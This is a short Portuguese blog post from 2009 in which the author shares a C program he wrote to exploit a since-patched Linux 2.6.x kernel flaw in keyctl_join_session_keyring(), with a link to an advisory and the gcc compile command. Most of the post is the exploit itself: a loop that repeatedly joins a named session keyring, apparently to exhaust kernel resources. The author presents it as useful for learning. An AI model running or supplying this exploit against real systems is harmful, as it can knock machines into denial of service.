Kernel Vulnerability Script

agosto 22, 2009

Estava apagando algumas coisas em meu HD, e achei esse script em C que fiz para explorar uma falha que existia no Kernel 2.6.x na chamada keyctl_join_session_keyring().

Essa falha já foi corrigida, mas talvez seja útil para aprendizado. Assim, segue:

http://www.vupen.com/english/advisories/2009/0173

#include <stdio.h>
#include <stdlib.h>
#include <keyutils.h>
#include <linux/keyctl.h>

int
main (void)
{
long ret = 0;

while ((ret = keyctl(KEYCTL_JOIN_SESSION_

KEYRING, “name”)) != (long) -1)
printf(“>> Retorno da chave: %ld\n”, ret);

return 0;

}

Compile:

gcc -o kernel_script kernel_script.c -lkeyutils


Anúncios

Deixe um comentário

Preencha os seus dados abaixo ou clique em um ícone para log in:

Logotipo do WordPress.com

Você está comentando utilizando sua conta WordPress.com. Sair / Alterar )

Imagem do Twitter

Você está comentando utilizando sua conta Twitter. Sair / Alterar )

Foto do Facebook

Você está comentando utilizando sua conta Facebook. Sair / Alterar )

Foto do Google+

Você está comentando utilizando sua conta Google+. Sair / Alterar )

Conectando a %s

%d blogueiros gostam disto: